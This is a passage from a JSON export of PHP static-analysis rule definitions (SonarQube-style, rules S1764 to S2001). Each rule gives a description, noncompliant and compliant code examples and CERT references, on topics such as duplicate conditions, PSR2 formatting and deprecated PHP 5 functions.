href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/OYIyAQ\">CERT, MSC07-CPP.<\/a> - Detect and remove dead code <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1764","repo":"php","name":"Identical expressions should not be used on both sides of a binary operator","htmlDesc":"<p>Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy\/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.<\/p>\n<p>This rule ignores <code>*<\/code>, <code>+<\/code>, and <code>=<\/code>. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ( $a == $a ) { \/\/ always true\n  doZ();\n}\nif ( $a != $a ) { \/\/ always false\n  doY();\n}\nif ( $a == $b &amp;&amp; $a == $b ) { \/\/ if the first one is true, the second one is too\n  doX();\n}\nif ( $a == $b || $a == $b ) { \/\/ if the first one is true, the second one is too\n  doW();\n}\n\n$j = 5 \/ 5; \/\/always 1\n$k = 5 - 5; \/\/always 0\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.<\/p>\n<pre>\n$i = 1 &lt;&lt; 1; \/\/ Compliant\n$j = $a &lt;&lt; $a; \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n  <li> <a href='\/coding_rules#rule_key=php%3AS1656'>S1656<\/a> - Implements a check on <code>=<\/code>. <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1765","repo":"php","name":"The \"var\" keyword should not be used","htmlDesc":"<p>The PHP 4 method of declaring a variable, using the <code>var<\/code> keyword, was deprecated in early versions of PHP 5. Even though it's not\nconsidered deprecated in the most recent versions, it's nonetheless not best practice to use it. When <code>var<\/code> does appear, it is interpreted\nas a synonym for <code>public<\/code> and treated as such. 
Therefore <code>public<\/code> should be used instead.<\/p>\n<p>From the PHP Manual:<\/p>\n<blockquote>\n  <p>The PHP 4 method of declaring a variable with the var keyword is still supported for compatibility reasons (as a synonym for the public keyword).\n  In PHP 5 before 5.1.3, its usage would generate an E_STRICT warning.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    var $bar = 1;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n    public $bar = 1;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1766","repo":"php","name":"More than one property should not be declared per statement","htmlDesc":"<p>For better readability, do not put multiple property declarations in the same statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar = 1, $bar2 = 2;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\nclass Foo\n{\n   private $bar1 = 1;\n   private $bar2 = 2;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1779","repo":"php","name":"Only LF character (Unix-like) should be used to end lines","htmlDesc":"<p>All developers should use the same end-line character(s) to prevent polluting the history changelog of source files in the SCM engine. 
Moreover\nsome SCM engines like Git might sometimes badly support use of Windows 'CRLF' end of line characters.<\/p>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1780","repo":"php","name":"Closing tag \"?>\" should be omitted on files containing only PHP","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The closing <code>?&gt;<\/code> tag should be omitted from files containing only PHP.<\/p>\n<\/blockquote>\n<p>According to the PHP manual:<\/p>\n<blockquote>\n  <p>in some cases omitting it is helpful when using include or require, so unwanted whitespace will not occur at the end of files, and you will still\n  be able to add headers to the response later. It is also handy if you use output buffering, and would not like to see added unwanted whitespace at\n  the end of the parts generated by the included files.<\/p>\n<\/blockquote>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1781","repo":"php","name":"PHP keywords and constants \"true\", \"false\", \"null\" should be lower case","htmlDesc":"<p>Using indifferently lower or upper case for PHP keywords and constants \"true\", \"false\" and \"null\" can impact the readability of PHP source\ncode.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php ECHO 'Hello World'; ?&gt;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php echo 'Hello World'; ?&gt;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1784","repo":"php","name":"Method visibility should be explicitly declared","htmlDesc":"<p>Class methods may be defined as public, private, or protected. Methods declared without any explicit visibility keyword are defined as public. 
To\nprevent any misunderstanding, this visibility should always be explicitly declared.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function foo(){...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1788","repo":"php","name":"Method arguments with default values should be last","htmlDesc":"<p>The ability to define default values for method arguments can make a method easier to use. Default argument values allow callers to specify as many\nor as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code. <\/p>\n<p>But all method arguments with default values should be declared after the method arguments without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values in order to \"get to\" the non-default arguments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction makeyogurt($type = \"acidophilus\", $flavor){...}  \/\/ Noncompliant\n\nmakeyogurt(\"raspberry\")}}  \/\/ Runtime error: Missing argument 2 in call to makeyogurt()\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction makeyogurt($flavor, $type = \"acidophilus\", ){...}\n\nmakeyogurt(\"raspberry\")}} \/\/ Works as expected\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1793","repo":"php","name":"\"elseif\" keyword should be used in place of \"else if\" keywords","htmlDesc":"<p>According to the PSR2 coding standard:<\/p>\n<blockquote>\n  <p>The keyword <code>elseif<\/code> SHOULD be used instead of <code>else if<\/code> so that all control keywords look like single words.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} else if ($expr2) {\n  ...\n} else {...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($expr1) {\n  ...\n} elseif ($expr2) 
{\n  ...\n} else {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1799","repo":"php","name":"\"exit(...)\" and \"die(...)\" statements should not be used","htmlDesc":"<p>The <code>exit(...)<\/code> and <code>die(...)<\/code> statements should absolutely not be used in Web PHP pages as this might lead to a very bad\nuser experience. In such case, the end user might have the feeling that the web site is down or has encountered a fatal error. <\/p>\n<p>But of course PHP can also be used to develop command line application and in such case use of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatement can be justified but must remain limited and not spread all over the application. We expect exceptions to be used to handle errors and those\nexceptions should be caught just before leaving the application to specify the exit code with help of <code>exit(...)<\/code> or <code>die(...)<\/code>\nstatements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            exit(23);\n        }\n    }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo {\n    public function bar($param)  {\n        if ($param === 42) {\n            throw new Exception('Value 42 is not expected.');\n        }\n    }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1808","repo":"php","name":"Source code should comply with formatting standards","htmlDesc":"<p>Shared coding conventions make it possible for a team to collaborate efficiently. This rule raises issues for failures to comply with formatting\nstandard. 
The default parameter values conform to the PSR2 standard.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default PSR2 parameter values:<\/p>\n<pre>\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be placed after the \"namespace\" declaration\n\nnamespace Vendor\\Package;\nuse FooClass;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"namespace\" declaration should be followed by a blank line\n$foo = 1;\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002  \/\/ Noncompliant; the \"use\" declaration should be followed by a blank line\n\nclass ClassA {\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002 \u2002 \u2002\/\/ Noncompliant; an open curly brace should be at the beginning of a new line for classes and functions\n\u2002\u2002function my_function(){ \u2002\/\/ Noncompliant; curly brace on wrong line\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002\u2002\u2002\u2002\u2002\u2002\u2002\/\/ Noncompliant; an open curly brace should be at the end of line for a control structure\n\u2002\u2002\u2002\u2002{\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002   {\u2002\/\/ Noncompliant; there should be exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if($thirdThing) {      \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    }\n    else {                 \/\/ Noncompliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword should be located on the same line\n      ...\n    }\n\n    try{                   \/\/ Noncompliant; there should be exactly one space between the control structure keyword and the 
curly brace\n      ...\n    } catch (Exception $e) {\n\u2002\u2002  }\n\n    analyse( $fruit ) ;    \/\/ Noncompliant; there should not be any space after the opening parenthesis and before the closing parenthesis\n\n    for ($i = 0;$i &lt; 10;   $i++) { \/\/ Nomcompliant; there should be exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    pressJuice($apply ,$orange);    \/\/ Noncompliant; the comma should be followed by one space and not preceded by any\n\n    do_something ();       \/\/ Noncompliant; there should not be any space after the method name\n\n    foreach ($fruits    as $fruit_key =&gt;     $fruit) {  \/\/ Noncompliant; in the foreach statement there should be one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\nclass ClassB\nextends ParentClass  \/\/ Noncompliant; the class name and the \"extends\" \/ \"implements\" keyword should be on the same line\n{\n  ...\n}\n\nclass ClassC extends ParentClass implements \\ArrayAccess, \\Countable,\n    \\Serializable    \/\/ Noncompliant; the list of implemented interfaces should be correctly indented\n{\n\n  public function aVeryLongMethodName(ClassTypeHint $arg1, \/\/ Noncompliant; the arguments in a method declaration should be correctly indented\n    &amp;$arg2, array $arg3 = []) {\n\n    $noArgs_longVars = function () use ($longVar1,         \/\/ Noncompliant; the arguments in a function declaration should be correctly indented\n        $longerVar2,\n        $muchLongerVar3\n    ) {\n      ...\n    };\n\n    $foo-&gt;bar($longArgument,    \/\/ Noncompliant; the arguments in a method call should be correctly indented\n      $longerArgument,\n      $muchLongerArgument);     \/\/ Noncompliant; the closing parenthesis should be placed on the next line\n\n    $closureWithArgsAndVars = function($arg1, $arg2)use   ($var1, $var2) {  \/\/ Noncompliant; the closure declaration should be correctly spaced - see (5)\n      ...\n    };\n  
}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nnamespace Vendor\\Package; \/\/ Compliant; the \"namespace\" declaration is followed by a blank line\n\nuse FooClass;             \/\/ Compliant; the \"use\" declaration is placed after the \"namespace\" declaration\n                          \/\/ Compliant; the \"use\" declaration is followed by a blank line\n$foo = 1;\n\nclass ClassA\n{\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002\u2002           \u2002\/\/ Compliant; the open curly brace is at the beginning of a new line for the class\n\u2002\u2002function my_function()\n  {\u2002\u2002\u2002\u2002                   \/\/ Compliant; the open curly brace is at the beginning of a new line for the function\n\u2002\u2002\u2002\u2002if ($firstThing)\u2002{\u2002\u2002\u2002\u2002\/\/ Compliant; the open curly brace is at the end of line for the control structure\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n\u2002\u2002\u2002\u2002if ($secondThing)\u2002{\u2002\u2002 \/\/ Compliant; there is exactly one space between the closing parenthesis and the opening curly brace\n\u2002\u2002\u2002\u2002\u2002\u2002...\n\u2002\u2002\u2002\u2002}\n\n    if ($thirdThing) {    \/\/ Compliant; there is exactly one space between the control structure keyword and the opening parenthesis\n      ...\n    } else {              \/\/ Compliant; the close curly brace and the next \"else\" (or \"catch\" or \"finally\") keyword are located on the same line\n      ...\n    }\n\n    try {                 \/\/ Compliant; there is exactly one space between the control structure keyword and the curly brace\n      ...\n    } catch (Exception $e) {\n      ...\n    }\n\n    analyse($fruit);      \/\/ Compliant: there is no space after the opening parenthesis, nor before the closing parenthesis\n\n    for ($i = 0; $i &lt; 10; $i++) { \/\/ Compliant: there is exactly one space after each \";\" in the {{for}} statement\n      ...\n    }\n\n    
pressJuice($apply, $orange);   \/\/ Compliant; the comma is followed by one space and is not preceded by any\n\n    do_something();       \/\/ Compliant; there is no space after the method name\n\n    foreach ($fruits as $fruit_key =&gt; $fruit) {  \/\/ Compliant; in the foreach statement there is one space before and after \"as\" keyword and \"=&gt;\" operator\n      ...\n    }\n  }\n}\n\n\/* The idea here is to make it obvious at first glance that a class extends\n * some other classes and\/or implements some interfaces. The names of\n * extended classes or implemented interfaces can be located on subsequent lines.\n *\/\nclass ClassB1 extends ParentClass \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\n{\n  ...\n}\n\nclass ClassB2 extends             \/\/ Compliant; the class name and the \"extends\" (or \"implements\") keyword are located on the same line\nParentClass {\n  ...\n}\n\n\/* Lists of implements may be split across multiple lines, where each subsequent line\n * is indented once. When doing so, the first item in the list should be on the next line,\n * and there should be only one interface per line.\n *\/\nclass ClassC extends ParentClass implements\n    \\ArrayAccess,         \/\/ Compliant; the list of implemented interfaces is correctly indented\n    \\Countable,\n    \\Serializable\n{\n  \/* Argument lists may be split across multiple lines, where each subsequent line\n   * is indented once. When doing so, the first item in the list should be on the next line,\n   * and there should be only one argument per line. 
Also, when the argument list is\n   * split across multiple lines, the closing parenthesis and opening brace should be\n   * placed together on their own line with one space between them.\n   *\/\n  public function aVeryLongMethodName(\n    ClassTypeHint $arg1,  \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n      &amp;$arg2,\n      array $arg3 = []\n    ) {\n      $noArgs_longVars = function () use (\n        $longVar1,        \/\/ Compliant; the arguments in a method\/function declaration are correctly indented\n        $longerVar2,\n        $muchLongerVar3\n      ) {\n        ...\n      };\n\n\n    \/* Argument lists may be split across multiple lines, where each subsequent line is\n     * indented once. When doing so, the first item in the list should be on the next line,\n     * and there should be only one argument per line.\n     *\/\n    $foo-&gt;bar(\n      $longArgument,       \/\/ Compliant; the arguments in the method call are be correctly indented\n      $longerArgument,\n      $muchLongerArgument\n    );                     \/\/ Compliant; the closing parenthesis is placed on a separate line\n\n    \/* Closures should be declared with a space after the \"function\" keyword,\n     * and a space before and after the \"use\" keyword.\n     *\/\n    $closureWithArgsAndVars = function ($arg1, $arg2) use ($var1, $var2) { \/\/ Compliant; the closure declaration is correctly spaced\n      ...\n    };\n  }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[{"key":"extends_implements_line","htmlDesc":"Class names, &quot;extends&quot; and &quot;implements&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space_method_name","htmlDesc":"There should not be any space after a method name","defaultValue":"true","type":"BOOLEAN"},{"key":"closure_format","htmlDesc":"Closures declaration should be correctly 
spaced","defaultValue":"true","type":"BOOLEAN"},{"key":"space_comma","htmlDesc":"Commas should be followed by one space and not preceded by any","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_classes_functions","htmlDesc":"Open curly braces should be at the beginning of a new line for classes and functions","defaultValue":"true","type":"BOOLEAN"},{"key":"namespace_blank_line","htmlDesc":"&quot;namespace&quot; declarations should be followed by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"open_curly_brace_control_structures","htmlDesc":"Open curly braces should be at the end of line for control structures","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_after","htmlDesc":"There should be exactly one space between closing parenthesis and opening curly braces","defaultValue":"true","type":"BOOLEAN"},{"key":"interfaces_indentation","htmlDesc":"List of implemented interfaces should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"foreach_space","htmlDesc":"In foreach statement there should be one space before and after &quot;as&quot; keyword and &quot;=&gt;&quot; operator","defaultValue":"true","type":"BOOLEAN"},{"key":"no_space","htmlDesc":"There should not be any space after the opening parenthesis and before the closing parenthesis","defaultValue":"true","type":"BOOLEAN"},{"key":"function_calls_arguments_indentation","htmlDesc":"Arguments in method\/function calls should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"closing_curly_brace","htmlDesc":"Close curly brace and the next &quot;else&quot;, &quot;catch&quot; and &quot;finally&quot; keywords should be located on the same line","defaultValue":"true","type":"BOOLEAN"},{"key":"function_declaration_arguments_indentation","htmlDesc":"Arguments in method\/function declarations should be correctly indented","defaultValue":"true","type":"BOOLEAN"},{"key":"use_blank_line","htmlDesc":"&quot;use&quot; declarations should be followed 
by a blank line","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_for","htmlDesc":"There should be one space after each &quot;;&quot; in &quot;for&quot; statement","defaultValue":"true","type":"BOOLEAN"},{"key":"use_after_namespace","htmlDesc":"&quot;use&quot; declarations should be placed after &quot;namespace&quot; declarations","defaultValue":"true","type":"BOOLEAN"},{"key":"one_space_before","htmlDesc":"There should be exactly one space between control structure keyword and opening parenthesis or curly brace","defaultValue":"true","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"php:S1848","repo":"php","name":"Objects should not be created to be dropped immediately without being used","htmlDesc":"<p>There is no good reason to create a new object to not do anything with it. Most of the time, this is due to a missing piece of code and so could\nlead to an unexpected behavior in production.<\/p>\n<p>If it was done on purpose because the constructor has side-effects, then that side-effect code should be moved into a separate, static method and\ncalled directly.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($x &lt; 0) {\n  new foo;  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$var = NULL;\nif ($x &lt; 0) {\n  $var = new foo;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1862","repo":"php","name":"Related \"if\/else if\" statements and \"cases\" in a \"switch\" should not have the same condition","htmlDesc":"<p>A <code>switch<\/code> and a chain of <code>if<\/code>\/<code>else if<\/code> statements is evaluated from top to bottom. At most, only one branch will\nbe executed: the first one with a condition that evaluates to <code>true<\/code>.<\/p>\n<p>Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy\/paste error. 
At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.<\/p>\n<p>For a <code>switch<\/code>, if the first case ends with a <code>break<\/code>, the second case will never be executed, rendering it dead code. Worse\nthere is the risk in this situation that future maintenance will be done on the dead case, rather than on the one that's actually used.<\/p>\n<p>On the other hand, if the first case does not end with a <code>break<\/code>, both cases will be executed, but future maintainers may not notice\nthat.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 1)  \/\/ Noncompliant\n  moveWindowToTheBackground();\n\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  case 1:  \/\/ Noncompliant\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($param == 1)\n  openWindow();\nelse if ($param == 2)\n  closeWindow();\nelse if ($param == 3)\n  moveWindowToTheBackground();\n\nswitch($i) {\n  case 1:\n    \/\/...\n    break;\n  case 3:\n    \/\/...\n    break;\n  default:\n    \/\/ ...\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1871","repo":"php","name":"Two branches in the same conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in the same <code>switch<\/code> statement or branches 
in the same <code>if<\/code> structure with the same\nimplementation is at best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an\n<code>if<\/code> structure they should be combined, or for a <code>switch<\/code>, one should fall through to the other. <\/p>\n<p>Moreover when the second and third operands of a ternary operator are the same, the operator will always return the same value regardless of the\ncondition. Either the operator itself is pointless, or a mistake was made in coding it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing(); \/\/ Noncompliant; duplicates then-branch\n}\n\nvar b = a ? 
12 &gt; 4 : 4;  \/\/ Noncompliant; always results in the same value\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($i) {\n  case 1:\n  case 3:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif (($a &gt;= 0 &amp;&amp; $a &lt; 10) || ($a &gt;= 20 &amp;&amp; $a &lt; 50)) {\n  doTheThing();\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n\ndoOneMoreThing();\n\nb = 4;\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch ($i) {\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif ($a &gt;= 0 &amp;&amp; $a &lt; 10) {\n  doTheThing();\nelse if ($a &gt;= 10 &amp;&amp; $a &lt; 20) {\n  doTheOtherThing();\n}\nelse if ($a &gt;= 20 &amp;&amp; $a &lt; 50) {\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n\nif ($b == 0) {\n  doOneMoreThing();\n}\nelse {\n  doTheRest();\n}\n\nint b = a ? 12 &gt; 4 : 8;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1996","repo":"php","name":"Files should contain only one top-level class or interface each","htmlDesc":"<p>A file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to maintain. This\nis doubly true for a file with multiple top-level classes and interfaces. It is strongly advised to divide the file into one top-level class or\ninterface per file.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1997","repo":"php","name":"Files should not contain inline HTML","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
To avoid the confusion that can be caused by tangling two coding languages in the\nsame file, inline HTML should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n&lt;?php\n$name = \"George\";\n?&gt;\n&lt;p&gt; Hello &lt;?php echo $name ?&gt;!&lt;\/p&gt;\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>File having the extension <code>.phtml<\/code> are ignored by this rule because they are expected to have mixed PHP and HTML.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1998","repo":"php","name":"References should not be passed to function calls","htmlDesc":"<p>Passing a reference to a function parameter means that any modifications the method makes to the parameter will be made to the original value as\nwell, since references have the effect of pointing two variables at the same memory space. This feature can be difficult to use correctly,\nparticularly if the callee is not expecting a reference, and the improper use of references in function calls can make code less efficient rather than\nmore efficient. <\/p>\n<p>Further, according to the PHP manual: <\/p>\n<blockquote>\n  As of PHP 5.3.0, you will get a warning saying that \"call-time pass-by-reference\" is deprecated... 
And as of PHP 5.4.0, call-time pass-by-reference\n  was removed, so using it will raise a fatal error.\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyfun(&amp;$name);  \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyfun($name);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/374\">MITRE, CWE-374<\/a> - Weakness Base Passing Mutable Objects to an Untrusted Method <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2000","repo":"php","name":"Files should not contain characters before \"<?php\"","htmlDesc":"<p>Having characters before <code>&lt;?php<\/code> can cause \"Cannot modify header information\" errors and similar problems with Ajax requests.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\ntest&lt;?php  \/\/Noncompliant\n\/\/ ...\n<\/pre>\n<p>and<\/p>\n<pre>\n\/\/ Noncompliant; newline before opening tag\n&lt;?php\n\/\/ ...\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n&lt;?php\n\/\/ ...\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2001","repo":"php","name":"Functions deprecated in PHP 5 should not be used","htmlDesc":"<p>Deprecated language features are those that have been retained temporarily for backward compatibility, but which will eventually be removed from\nthe language. In effect, deprecation announces a grace period to allow the smooth transition from the old features to the new ones. 
In that period, no\nuse of the deprecated features should be added to the code, and all existing uses should be gradually removed.<\/p>\n<p>The following functions were deprecated in PHP 5:<\/p>\n<table>\n  <tbody>\n    <tr>\n      <th>Deprecated<\/th>\n      <th>Use Instead<\/th>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method()<\/code><\/td>\n      <td><code>call_user_func()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>call_user_method_array()<\/code><\/td>\n      <td><code>call_user_func_array()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>define_syslog_variables()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>dl()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg()<\/code><\/td>\n      <td><code>preg_match()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>ereg_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> (note that this is deprecated in PHP 5.5)<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi()<\/code><\/td>\n      <td><code>preg_match()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>eregi_replace()<\/code><\/td>\n      <td><code>preg_replace()<\/code> with 'i' modifier<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_magic_quotes_runtime()<\/code> and its alias, <code>magic_quotes_runtime()<\/code><\/td>\n      <td><\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_register()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_unregister()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>session_is_registered()<\/code><\/td>\n      <td><code>$_SESSION<\/code> superglobal<\/td>\n    <\/tr>\n    <tr>\n      <td><code>set_socket_blocking()<\/code><\/td>\n      <td><code>stream_set_blocking()<\/code><\/td>\n    <\/tr>\n    <tr>\n      <td><code>split()<\/code><\/td>\n      <td><code>preg_split()<\/code><\/td>\n    
